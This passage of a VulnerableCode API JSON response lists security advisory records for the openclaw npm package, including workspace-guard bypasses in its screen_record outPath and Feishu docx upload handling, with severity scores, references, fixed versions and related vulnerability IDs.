                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8j7f-g9gv-7jhc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-8j7f-g9gv-7jhc"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mggy-bv5s-5uax"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89450?format=api",
            "vulnerability_id": "VCID-mszk-dr24-xugw",
            "summary": "OpenClaw: screen_record outPath bypassed workspace-only filesystem guard\n## Summary\n\nscreen_record outPath bypassed workspace-only filesystem guard.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary.\n\n## Technical Details\n\nThe fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths.\n\n## Fix\n\nThe issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `635bb35b68d8faa5bfa2fda35feadd315122748a`\n- PR: #63551\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43567",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08891",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10398",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1044",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43567"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63551",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63551"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43567",
                    "reference_id": "CVE-2026-43567",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43567"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jf25-7968-h2h5",
                    "reference_id": "GHSA-jf25-7968-h2h5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jf25-7968-h2h5"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter",
                    "reference_id": "openclaw-path-traversal-in-screen-record-outpath-parameter",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43567",
                "GHSA-jf25-7968-h2h5"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mszk-dr24-xugw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90208?format=api",
            "vulnerability_id": "VCID-mv8b-cryt-u3g8",
            "summary": "OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix)\n## Impact\n\nFeishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix).\n\nFeishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.3`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Rosayxy for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41911",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19277",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19229",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00061",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19273",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41911"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41911",
                    "reference_id": "CVE-2026-41911",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41911"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5fc7-f62m-8983",
                    "reference_id": "GHSA-5fc7-f62m-8983",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5fc7-f62m-8983"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image",
                    "reference_id": "openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:39:00Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-workspace-only-filesystem-policy-bypass-via-docx-upload-file-upload-image"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
